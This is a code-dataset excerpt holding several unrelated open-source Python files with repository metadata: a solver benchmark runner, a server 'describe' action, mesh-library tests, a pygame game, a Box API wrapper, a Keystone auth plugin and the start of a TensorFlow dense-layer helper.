bounds = ['lb=-1 1', 'lb=-10 10', 'lb=-inf inf']
boundsNum = len(bounds)
boundIndex = 0
while (raSATResult != 'sat' and time < timeout and boundIndex < boundsNum):
if raSATResult == 'unknown':
sbox = sbox / 10
subprocess.call(["./raSAT", os.path.join(root, filename), bounds[boundIndex], 'sbox=' + str(sbox), 'tout=' + str(timeout-time)])
try:
with open(os.path.join(root, filename) + '.tmp', 'rb') as csvfile:
reader = csv.reader(csvfile)
output = reader.next()
nVars = output[1]
maxVars = output[2]
nAPIs = output[3]
time += float(output[4])
iaTime += float(output[5])
testingTime += float(output[6])
usTime += float(output[7])
parsingTime += float(output[8])
decompositionTime += float(output[9])
miniSATTime += float(output[10])
miniSATVars += float(output[11])
miniSATClauses += float(output[12])
miniSATCalls += float(output[13])
raSATClauses += float(output[14])
decomposedLearnedClauses += float(output[15])
UNSATLearnedClauses += float(output[16])
unknownLearnedClauses += float(output[17])
isEquation = output[18]
isNotEquation = output[19]
raSATResult = output[20]
csvfile.close()
except IOError:
raSATResult = 'timeout'
if raSATResult == 'unsat':
boundIndex += 1
if raSATResult == 'sat' or raSATResult == 'unsat':
solvedProblems += 1
with open(os.path.join(directory, resultFile), 'a') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow([os.path.join(root, filename), nVars, maxVars, nAPIs, time, iaTime, testingTime, usTime, parsingTime, decompositionTime, miniSATTime, miniSATVars, miniSATClauses, miniSATCalls, raSATClauses, decomposedLearnedClauses, UNSATLearnedClauses, unknownLearnedClauses, result, raSATResult, isEquation, isNotEquation])
csvfile.close()
try:
os.remove(os.path.join(root, filename) + '.tmp')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.in')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.out')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.rs')
except OSError:
pass
with open(os.path.join(directory, resultFile), 'a') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow(['Problem', 'nVars', 'maxVars', 'nAPIs', 'time', 'iaTime', 'testingTime', 'usCoreTime', 'parsingTime', 'decompositionTime', 'miniSATTime', 'miniSATVars', 'miniSATClauses', 'miniSATCalls', 'raSATClauses', 'decomposedLearnedClauses', 'UNSATLearnedClauses', 'unknownLearnedClauses', 'result', solvedProblems, 'EQ', 'NEQ'])
csvfile.close()
#run ('zankl', -10, 10, 0.1, 500, 'with_dependency_sensitivity_restartSmallerBox_boxSelectionUsingSensitivity.xls')
#run ('QF_NRA/meti-tarski', -10, 10, 0.1, 500, 'with_dependency_sensitivity_restartSmallerBox_boxSelectionUsingSensitivity.xls')
#run ('Test/meti-tarski', -1, 1, 0.1, 60, 'result.xls')
#run ('Test/zankl', -10, 10, 0.1, 30, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/AProVE', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/calypto', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/leipzig', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/mcm', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NRA/hycomp', -10, 10, 0.1, 60, '1-5-8.csv')
run ('Test/smtlib-20140121/QF_NRA/meti-tarski', -10, 10, 0.1, 60, '1-5-8-11.csv')
#run ('Test/test', -10, 10, 0.1, 60, 'result.csv')
authors: ["[email protected]"]

---

blob_id: 95292dbab6b727fc93cbd5ed860178fecee84ca4 | directory_id: 752116ef4b69a3049fef0cfe9b3d212548cc81b1 | content_id: ef16f46eb7e4fe787faa620233f6f13455fd54fb
path: /sources/actions/watch/describe.py | extension: py | length_bytes: 4,418
repo_name: VDOMBoxGroup/runtime2.0 | branch_name: refs/heads/develop | snapshot_id: e54af4af7a642f34b0e07b5d4096320494fb9ae8 | revision_id: cb9932f5f75d5c6d7889f26d58aee079b4127299
detected_licenses: [] | license_type: no_license
visit_date: 2023-07-07T11:06:10.817093 | revision_date: 2023-07-03T06:11:55 | committer_date: 2023-07-03T06:11:55
github_id: 62,622,255 | star_events_count: 0 | fork_events_count: 12
gha_license_id: null | gha_event_created_at: 2023-05-23T02:55:00 | gha_created_at: 2016-07-05T09:09:48 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from logs import console
from utils.structure import Structure
from utils.parsing import VALUE, Parser, ParsingException
from ..auxiliary import section, show
from .auxiliary import query
REQUEST = "<action name=\"describe\">%s</action>"
SOURCE_OBJECTS_OPTION = "<option name=\"source\">objects</option>"
SOURCE_GARBAGE_OPTION = "<option name=\"source\">garbage</option>"
SOURCE_CHANGES_OPTION = "<option name=\"source\">changes</option>"
FILTER_BY_SERVER_OPTION = "<option name=\"filter\">server</option>"
SORT_BY_NAME = "SORT BY NAME"
SORT_BY_COUNTER = "SORT BY COUNTER"
SORT_VALUES = {
"n": SORT_BY_NAME,
"name": SORT_BY_NAME,
"c": SORT_BY_COUNTER,
"counter": SORT_BY_COUNTER
}
ORDER_BY_ASCENDING = "ORDER BY ASCENDING"
ORDER_BY_DESCENDING = "ORDER BY DESCENDING"
ORDER_VALUES = {
"a": ORDER_BY_ASCENDING,
"asc": ORDER_BY_ASCENDING,
"ascending": ORDER_BY_ASCENDING,
"d": ORDER_BY_DESCENDING,
"desc": ORDER_BY_DESCENDING,
"descending": ORDER_BY_DESCENDING
}
def sort_by_name(x):
return x[0]
def sort_by_counter(x):
return x[1], -x[2], x[0]
def builder(parser):
# <reply>
def reply():
result = Structure(entries=None)
# <descriptions>
def descriptions():
result.entries = []
# <subgroup>
def subgroup(name):
subgroup = []
result.entries.append((name, subgroup))
# <description>
def description(object):
value = yield VALUE
subgroup.append((object, value))
# </description>
return description
# </subgroup>
return subgroup
# </descriptions>
yield descriptions
parser.accept(result)
# </reply>
return reply
def run(address=None, port=None, timeout=None,
all=False, sort=None, order=None, limit=None,
objects=False, garbage=False, changes=False):
"""
describe server object changes
:param address: specifies server address
:key int port: specifies server port
:key float timeout: specifies timeout to wait for reply
:key switch all: disable objects filtering
:key sort: sort entries by "name" or by "counter"
:key order: sort entries "asc"ending or "desc"ending
:key int limit: limit output
:key switch objects: use all objects
:key switch garbage: use objects from garbage
:key switch changes: use changes
"""
try:
if sum((objects, garbage, changes)) > 1:
raise Exception("Options \"objects\", \"garbage\" and \"changes\" are mutually exclusive")
sort = SORT_VALUES.get((sort or "").lower(), SORT_BY_NAME)
if sort is SORT_BY_COUNTER and order is None:
order = "desc"
order = ORDER_VALUES.get((order or "").lower(), ORDER_BY_ASCENDING)
options = "".join(filter(None, (
SOURCE_OBJECTS_OPTION if objects else None,
SOURCE_GARBAGE_OPTION if garbage else None,
SOURCE_CHANGES_OPTION if changes else None,
None if all else FILTER_BY_SERVER_OPTION,)))
request = REQUEST % options
message = query("describe objects", address, port, request, timeout=timeout)
parser = Parser(builder=builder, notify=True, supress=True)
result = parser.parse(message)
if not result:
raise Exception("Incorrect response")
except ParsingException as error:
console.error("unable to parse, line %s: %s" % (error.lineno, error))
except Exception as error:
console.error(error)
else:
console.write()
with section("objects"):
if result.entries:
key = sort_by_counter if sort is SORT_BY_COUNTER else sort_by_name
reverse = order is ORDER_BY_DESCENDING
entries = sorted(result.entries, key=key, reverse=reverse)
if limit is not None:
entries = entries[:limit]
for name, subgroup in entries:
with section(name):
for object, description in subgroup:
with section(object, lazy=False):
for part in description.split(" < "):
show(part, longer=True)
else:
show("no objects")
|
[
"[email protected]"
] | |
87cee6b3fc7d259b87a0cb05ee0fee88ed14e10f
|
9ae2d337cbfa56768580187cc507f9c3c4ace1a8
|
/test/test_meshzoo.py
|
abc4f1e9a37a6ea0c9ac22e5aea80e860fa44c3f
|
[
"MIT"
] |
permissive
|
tongluocq/meshzoo
|
5a734012e02f70bdf37147a3520b733f5095da02
|
46d3a999b7537fdcea92cd19ae53920b8639b0b3
|
refs/heads/master
| 2020-09-26T11:21:16.086387 | 2019-10-16T16:36:25 | 2019-10-16T16:36:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,706 |
py
|
import numpy
import pytest
import meshzoo
from helpers import _near_equal
def test_cube():
points, cells = meshzoo.cube()
assert len(points) == 1331
assert len(cells) == 5000
points, cells = meshzoo.cube(nx=3, ny=3, nz=3)
assert len(points) == 27
assert all(numpy.sum(points, axis=0) == [13.5, 13.5, 13.5])
assert len(cells) == 40
def test_hexagon():
points, cells = meshzoo.hexagon(2)
assert len(points) == 61
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 96
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[1, 5890, 11400, [0, 0, 0], [2753575 / 9.0, 2724125 / 9.0, 58900 / 3.0]],
[2, 5890, 11400, [0, 0, 0], [2797750 / 9.0, 2679950 / 9.0, 58900 / 3.0]],
],
)
def test_moebius(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(num_twists, 190, 31, mode="smooth")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[
1,
5700,
11020,
[0, 0, 0],
[[296107.21982759, 292933.72844828, 19040.94827586]],
],
[
2,
5700,
11020,
[0, 0, 0],
[[300867.45689655, 288173.49137931, 19040.94827586]],
],
],
)
def test_moebius2(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(nl=190, nw=30, num_twists=num_twists, mode="smooth")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[1, 1000, 1800, [0, 0, 0], [1418750 / 27.0, 1418750 / 27.0, 137500 / 27.0]],
[2, 1000, 1800, [0, 0, 0], [484375 / 9.0, 1384375 / 27.0, 137500 / 27.0]],
],
)
def test_moebius3(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(num_twists, 100, 10, mode="classical")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
def test_pseudomoebius():
points, cells = meshzoo.moebius(nl=190, nw=31, mode="pseudo")
assert len(points) == 5890
assert len(cells) == 11400
assert _near_equal(numpy.sum(points, axis=0), [0, 0, 0], tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
ref2 = [2753575 / 9.0, 2724125 / 9.0, 58900 / 3.0]
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
def test_rectangle():
points, cells = meshzoo.rectangle(nx=11, ny=11, zigzag=False)
assert len(points) == 121
assert _near_equal(numpy.sum(points, axis=0), [60.5, 60.5, 0.0])
assert len(cells) == 200
points, cells = meshzoo.rectangle(nx=11, ny=11, zigzag=True)
assert len(points) == 121
assert _near_equal(numpy.sum(points, axis=0), [60.5, 60.5, 0.0])
assert len(cells) == 200
points, cells = meshzoo.rectangle(nx=2, ny=2, zigzag=True)
assert len(points) == 4
assert _near_equal(numpy.sum(points, axis=0), [2.0, 2.0, 0.0])
assert len(cells) == 2
points, cells = meshzoo.rectangle(nx=3, ny=2, zigzag=False)
assert len(points) == 6
assert _near_equal(numpy.sum(points, axis=0), [3.0, 3.0, 0.0])
assert len(cells) == 4
assert set(cells[0]) == set([0, 1, 4])
assert set(cells[2]) == set([0, 3, 4])
points, cells = meshzoo.rectangle(nx=3, ny=2, zigzag=True)
assert len(points) == 6
assert _near_equal(numpy.sum(points, axis=0), [3.0, 3.0, 0.0])
assert len(cells) == 4
assert set(cells[0]) == set([0, 1, 4])
assert set(cells[2]) == set([0, 3, 4])
def test_simple_arrow():
points, cells = meshzoo.simple_arrow()
assert len(points) == 5
assert _near_equal(numpy.sum(points, axis=0), [7.0, 0.0, 0.0])
assert len(cells) == 4
def test_simple_shell():
points, cells = meshzoo.simple_shell()
assert len(points) == 5
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 1.0])
assert len(cells) == 4
def test_triangle():
points, cells = meshzoo.triangle(4)
assert len(points) == 15
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 16
def test_tube():
points, cells = meshzoo.tube(n=10)
assert len(points) == 20
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 20
def test_plot2d():
points, cells = meshzoo.triangle(4)
meshzoo.show2d(points, cells)
# def test_ball():
# points, cells = meshzoo.meshpy.ball.create_ball_mesh(10)
# assert len(points) == 1360
# assert len(cells) == 5005
#
#
# def test_cube():
# points, cells = meshzoo.meshpy.cube.create_mesh(10)
# assert len(points) == 50
# assert len(cells) == 68
#
#
# def test_ellipse():
# points, cells = meshzoo.meshpy.ellipse.create_mesh(0.5, 1, 100)
# assert len(points) == 1444
# assert len(cells) == 2774
#
#
# def test_lshape():
# points, cells = meshzoo.meshpy.lshape.create_mesh()
# assert len(points) == 38
# assert len(cells) == 58
#
#
# def test_lshape3d():
# points, cells = meshzoo.meshpy.lshape3d.create_mesh()
# assert len(points) == 943
# assert len(cells) == 3394
#
#
# def test_pacman():
# points, cells = meshzoo.meshpy.pacman.create_pacman_mesh()
# assert len(points) == 446
# assert len(cells) == 831
#
#
# def test_rectangle():
# points, cells = meshzoo.meshpy.rectangle.create_mesh()
# assert len(points) == 88
# assert len(cells) == 150
#
#
# def test_rectangle_with_hole():
# points, cells = meshzoo.meshpy.rectangle_with_hole.create_mesh()
# assert len(points) == 570
# assert len(cells) == 964
#
#
# def test_tetrahedron():
# points, cells = meshzoo.meshpy.tetrahedron.create_tetrahedron_mesh()
# assert len(points) == 604
# assert len(cells) == 1805
#
#
# def test_torus():
# points, cells = meshzoo.meshpy.torus.create_mesh()
# assert len(points) == 921
# assert len(cells) == 2681
# Disable for now since Gmsh doesn't pass for the version installed on travis
# (trusty).
# def test_screw():
# points, cells = meshzoo.pygmsh.screw.create_screw_mesh()
# assert len(points) == 2412
# assert len(cells) == 7934
# Disable for now since we need mshr in a dev version for mshr.Extrude2D
# def test_toy():
# points, cells = meshzoo.mshr.toy.create_toy_mesh()
# assert len(points) == 2760
# assert len(cells) == 11779
# if __name__ == '__main__':
# test_plot2d()
# # import meshio
# # points_, cells_ = meshzoo.triangle(7)
# # meshio.write('triangle.vtu', points_, {'triangle': cells_})
# # points_, cells_ = meshzoo.cube()
# # meshio.write('cube.vtu', points_, {'tetra': cells_})
def test_edges():
_, cells = meshzoo.triangle(2)
edges_nodes, edges_cells = meshzoo.create_edges(cells)
assert numpy.all(
edges_nodes
== [[0, 1], [0, 3], [1, 2], [1, 3], [1, 4], [2, 4], [3, 4], [3, 5], [4, 5]]
)
assert numpy.all(edges_cells == [[3, 1, 0], [5, 4, 2], [6, 3, 4], [8, 7, 6]])
|
[
"[email protected]"
] | |
586fbbda387bcc0fd0af65aec9272afaf55c6d94
|
db3a0578ef5d79cee7f9e96fa3fd291bbaaf9eb4
|
/Pygame/Bees/bees.py
|
90620d058d1920a15e8892180aa8c230a8c0d55f
|
[
"MIT"
] |
permissive
|
otisgbangba/python-lessons
|
0477a766cda6bc0e2671e4cce2f95bc62c8d3c43
|
a29f5383b56b21e6b0bc21aa9acaec40ed4df3cc
|
refs/heads/master
| 2022-11-03T22:10:52.845204 | 2020-06-13T15:42:40 | 2020-06-13T15:42:40 | 261,255,751 | 1 | 0 |
MIT
| 2020-05-04T17:48:12 | 2020-05-04T17:48:11 | null |
UTF-8
|
Python
| false | false | 1,885 |
py
|
import pygame, random
from pygame.locals import *
from util import loadImage
from bee import Bee
from flower import Flower
from score import Score
pygame.init()
TITLE = 'Bee, Get the Nectar!'
screen = pygame.display.set_mode((1280, 720), 0)
screenRect = screen.get_rect()
Bee.loadImages()
Flower.loadImages()
background = loadImage('clover-large.jpg')
font = pygame.font.Font(None, 48)
text = font.render(TITLE, 1, Color('white'))
textpos = text.get_rect(centerx=screenRect.width/2, centery=25)
background.blit(text, textpos)
screen.blit(background, (0, 0))
pygame.display.flip()
bee = Bee(screenRect)
flowers = pygame.sprite.Group()
score = Score()
drawingGroup = pygame.sprite.RenderUpdates()
drawingGroup.add(bee)
drawingGroup.add(score)
pygame.display.set_caption(TITLE)
pygame.mouse.set_visible(0)
clock = pygame.time.Clock()
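# Heading lookup in degrees, indexed below as angles[ydir+1][xdir+1],
# where xdir and ydir are each -1, 0 or 1 depending on the arrow keys held.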
angles = (( 45, 0, -45),
( 90, 0, -90),
(135, 180, -135))
# game loop
loop = True
while loop:
# get input
for event in pygame.event.get():
if event.type == QUIT \
or (event.type == KEYDOWN and event.key == K_ESCAPE):
loop = False
keystate = pygame.key.get_pressed()
xdir = keystate[K_RIGHT] - keystate[K_LEFT] # -1, 0, or 1
ydir = keystate[K_DOWN] - keystate[K_UP]
bee.setAngle(angles[ydir+1][xdir+1])
bee.rect = bee.rect.move((xdir * 8, ydir * 8)).clamp(screenRect)
# Detect collisions
    # dokill=True already removes each hit flower from all of its groups
    for flower in pygame.sprite.spritecollide(bee, flowers, True):
        score.score += 1
if random.randint(0, 50) == 0:
flower = Flower(screenRect)
drawingGroup.add(flower)
flowers.add(flower)
drawingGroup.clear(screen, background)
drawingGroup.update()
changedRects = drawingGroup.draw(screen)
pygame.display.update(changedRects)
# maintain frame rate
clock.tick(40)
pygame.quit()
|
[
"[email protected]"
] | |
fc5c6cf54acdc92357aedf5a77af4161c7885cb0
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Box/Users/DeleteUser.py
|
19db5a19eb485a39cf7171ed247400616e188e0a
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,041 |
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# DeleteUser
# Deletes a specified user.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteUser(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteUser Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Box/Users/DeleteUser')
def new_input_set(self):
return DeleteUserInputSet()
def _make_result_set(self, result, path):
return DeleteUserResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteUserChoreographyExecution(session, exec_id, path)
class DeleteUserInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteUser
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_Force(self, value):
"""
Set the value of the Force input for this Choreo. ((optional, boolean) Whether or not the user should be deleted even when they still own files.)
"""
InputSet._set_input(self, 'Force', value)
def set_Notify(self, value):
"""
Set the value of the Notify input for this Choreo. ((optional, boolean) Indicates that the user should receive an email notification of the transfer.)
"""
InputSet._set_input(self, 'Notify', value)
def set_UserID(self, value):
"""
Set the value of the UserID input for this Choreo. ((required, string) The id of the user whose information should be updated.)
"""
InputSet._set_input(self, 'UserID', value)
class DeleteUserResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteUser Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Box.)
"""
return self._output.get('Response', None)
class DeleteUserChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteUserResultSet(response, path)
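# Illustrative usage sketch (assumes a valid TembooSession; the token and
# user id below are placeholders, not real values):
#
# choreo = DeleteUser(session)
# inputs = choreo.new_input_set()
# inputs.set_AccessToken('ACCESS_TOKEN')
# inputs.set_UserID('USER_ID')
# results = choreo.execute_with_results(inputs)
# print(results.get_Response())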
|
[
"[email protected]"
] | |
b4fdf0086dda0bb0a9e8e631adbd62959995d35f
|
be01d0d54723d1e876c9a15618921dffe2b2255a
|
/Python/BinarySearch/two_sumII.py
|
0d534e7163571ad8332aad8f4b807b4999e276c6
|
[] |
no_license
|
jxlxt/leetcode
|
17e7f25bf94dd334ac0d6254ffcffa003ed04c10
|
a6e6e5be3dd5f9501d0aa4caa6744621ab887f51
|
refs/heads/master
| 2023-05-26T22:10:03.997428 | 2023-05-24T02:36:05 | 2023-05-24T02:36:05 | 118,216,055 | 0 | 0 | null | 2018-01-20T06:31:57 | 2018-01-20T06:30:06 | null |
UTF-8
|
Python
| false | false | 1,122 |
py
|
#! /Users/xiaotongli/anaconda3/bin/python
# -*- coding: utf-8 -*-
# @Time : 9/28/18 10:57 PM
# @Author : Xiaotong Li
# @School : University of California, Santa Cruz
# @FileName: two_sumII.py
# @Software: PyCharm
class Solution:
def twoSum(self, numbers, target):
"""
:type numbers: List[int]
:type target: int
:rtype: List[int]
"""
        # First approach: a dictionary (hash map) from value to index
        seen = {}
        # enumerate() yields the index and value of each element
        for i, num in enumerate(numbers):
            if target - num in seen:
                return [seen[target - num] + 1, i + 1]
            seen[num] = i
        # Second approach: binary search for the complement of each element
for i in range(len(numbers)):
left, right = i+1, len(numbers) - 1
res = target - numbers[i]
while left <= right:
mid = left + (right - left) // 2
if numbers[mid] == res:
return [i+1, mid+1]
elif numbers[mid] < res:
left = mid + 1
else:
right = mid - 1
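# Illustrative usage (LeetCode 167 expects 1-indexed positions):
# Solution().twoSum([2, 7, 11, 15], 9) -> [1, 2]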
|
[
"[email protected]"
] | |
5bc08a32ba5bc9e78823dc89fe5070e1deb89e25
|
057d2d1e2a78fc89851154e87b0b229e1e1f003b
|
/venv/Lib/site-packages/keystoneclient/auth/identity/v2.py
|
add1da4f5d894be3192f1253735eca8da6d07f56
|
[
"Apache-2.0"
] |
permissive
|
prasoon-uta/IBM-Cloud-Secure-File-Storage
|
276dcbd143bd50b71121a73bc01c8e04fe3f76b0
|
82a6876316715efbd0b492d0d467dde0ab26a56b
|
refs/heads/master
| 2022-12-13T00:03:31.363281 | 2018-02-22T02:24:11 | 2018-02-22T02:24:11 | 122,420,622 | 0 | 2 |
Apache-2.0
| 2022-12-08T05:15:19 | 2018-02-22T02:26:48 |
Python
|
UTF-8
|
Python
| false | false | 7,824 |
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
from oslo_config import cfg
import six
from keystoneclient import access
from keystoneclient.auth.identity import base
from keystoneclient import exceptions
from keystoneclient import utils
_logger = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class Auth(base.BaseIdentityPlugin):
"""Identity V2 Authentication Plugin.
:param string auth_url: Identity service endpoint for authorization.
:param string trust_id: Trust ID for trust scoping.
:param string tenant_id: Tenant ID for project scoping.
:param string tenant_name: Tenant name for project scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
"""
@classmethod
def get_options(cls):
options = super(Auth, cls).get_options()
options.extend([
cfg.StrOpt('tenant-id', help='Tenant ID'),
cfg.StrOpt('tenant-name', help='Tenant Name'),
cfg.StrOpt('trust-id', help='Trust ID'),
])
return options
def __init__(self, auth_url,
trust_id=None,
tenant_id=None,
tenant_name=None,
reauthenticate=True):
super(Auth, self).__init__(auth_url=auth_url,
reauthenticate=reauthenticate)
self._trust_id = trust_id
self.tenant_id = tenant_id
self.tenant_name = tenant_name
@property
def trust_id(self):
# Override to remove deprecation.
return self._trust_id
@trust_id.setter
def trust_id(self, value):
# Override to remove deprecation.
self._trust_id = value
def get_auth_ref(self, session, **kwargs):
headers = {'Accept': 'application/json'}
url = self.auth_url.rstrip('/') + '/tokens'
params = {'auth': self.get_auth_data(headers)}
if self.tenant_id:
params['auth']['tenantId'] = self.tenant_id
elif self.tenant_name:
params['auth']['tenantName'] = self.tenant_name
if self.trust_id:
params['auth']['trust_id'] = self.trust_id
_logger.debug('Making authentication request to %s', url)
resp = session.post(url, json=params, headers=headers,
authenticated=False, log=False)
try:
resp_data = resp.json()['access']
except (KeyError, ValueError):
raise exceptions.InvalidResponse(response=resp)
return access.AccessInfoV2(**resp_data)
@abc.abstractmethod
def get_auth_data(self, headers=None):
"""Return the authentication section of an auth plugin.
:param dict headers: The headers that will be sent with the auth
request if a plugin needs to add to them.
:return: A dict of authentication data for the auth type.
:rtype: dict
"""
pass # pragma: no cover
_NOT_PASSED = object()
class Password(Auth):
"""A plugin for authenticating with a username and password.
A username or user_id must be provided.
:param string auth_url: Identity service endpoint for authorization.
:param string username: Username for authentication.
:param string password: Password for authentication.
:param string user_id: User ID for authentication.
:param string trust_id: Trust ID for trust scoping.
:param string tenant_id: Tenant ID for tenant scoping.
:param string tenant_name: Tenant name for tenant scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
:raises TypeError: if a user_id or username is not provided.
"""
def __init__(self, auth_url, username=_NOT_PASSED, password=None,
user_id=_NOT_PASSED, **kwargs):
super(Password, self).__init__(auth_url, **kwargs)
if username is _NOT_PASSED and user_id is _NOT_PASSED:
msg = 'You need to specify either a username or user_id'
raise TypeError(msg)
if username is _NOT_PASSED:
username = None
if user_id is _NOT_PASSED:
user_id = None
self.user_id = user_id
self._username = username
self._password = password
@property
def username(self):
# Override to remove deprecation.
return self._username
@username.setter
def username(self, value):
# Override to remove deprecation.
self._username = value
@property
def password(self):
# Override to remove deprecation.
return self._password
@password.setter
def password(self, value):
# Override to remove deprecation.
self._password = value
def get_auth_data(self, headers=None):
auth = {'password': self.password}
if self.username:
auth['username'] = self.username
elif self.user_id:
auth['userId'] = self.user_id
return {'passwordCredentials': auth}
@classmethod
def load_from_argparse_arguments(cls, namespace, **kwargs):
if not (kwargs.get('password') or namespace.os_password):
kwargs['password'] = utils.prompt_user_password()
return super(Password, cls).load_from_argparse_arguments(namespace,
**kwargs)
@classmethod
def get_options(cls):
options = super(Password, cls).get_options()
options.extend([
cfg.StrOpt('username',
dest='username',
deprecated_name='user-name',
help='Username to login with'),
cfg.StrOpt('user-id', help='User ID to login with'),
cfg.StrOpt('password', secret=True, help='Password to use'),
])
return options
class Token(Auth):
"""A plugin for authenticating with an existing token.
:param string auth_url: Identity service endpoint for authorization.
:param string token: Existing token for authentication.
:param string tenant_id: Tenant ID for tenant scoping.
:param string tenant_name: Tenant name for tenant scoping.
:param string trust_id: Trust ID for trust scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
"""
def __init__(self, auth_url, token, **kwargs):
super(Token, self).__init__(auth_url, **kwargs)
self._token = token
@property
def token(self):
# Override to remove deprecation.
return self._token
@token.setter
def token(self, value):
# Override to remove deprecation.
self._token = value
def get_auth_data(self, headers=None):
if headers is not None:
headers['X-Auth-Token'] = self.token
return {'token': {'id': self.token}}
@classmethod
def get_options(cls):
options = super(Token, cls).get_options()
options.extend([
cfg.StrOpt('token', secret=True, help='Token'),
])
return options
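# Minimal usage sketch (endpoint and credentials are placeholders):
#
# from keystoneclient import session as ks_session
# auth = Password('http://keystone:5000/v2.0',
#                 username='demo', password='secret', tenant_name='demo')
# sess = ks_session.Session(auth=auth)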
|
[
"[email protected]"
] | |
319a8ecd8143da437cd5720b73ed24a1a396c1cc
|
2f09e893c3a21f4a17c95b99446d1efbf0b109f7
|
/huaytools/tensorflow/layers/__init__.py
|
6f45582415c893a8cb74a1d2dd931b0b6805be10
|
[
"MIT"
] |
permissive
|
knight134/huaytools
|
b19f0078e724963415c63d60218ae3cc624f598a
|
cbecd6771c05f8241e756a7619047589397b16d3
|
refs/heads/master
| 2020-04-24T18:30:27.732740 | 2018-05-27T13:51:24 | 2018-05-27T13:51:24 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,595 |
py
|
"""
"""
import tensorflow as tf
import tensorlayer as tl
# from .cnn import *
# from .rnn import *
from .attention import *
from .embedding import *
logging = tf.logging
def dense(inputs, n_units,
activation=tf.nn.relu,
use_bias=True,
W_init=tf.truncated_normal_initializer(stddev=0.1),
W_init_args=None,
b_init=tf.constant_initializer(value=0.0),
b_init_args=None,
name="dense",
reuse=None):
"""全连接层
input_shape: [batch_size, n_features]
output_shape: [batch_size, n_units]
References:
tf.layers.Dense
tl.layers.DenseLayer
"""
W_init_args = {} if W_init_args is None else W_init_args
b_init_args = {} if b_init_args is None else b_init_args
logging.info("DenseLayer: %s - n_units: %d activation: %s" % (name, n_units, activation.__name__))
# n_inputs = int(tf.convert_to_tensor(inputs).get_shape()[-1])
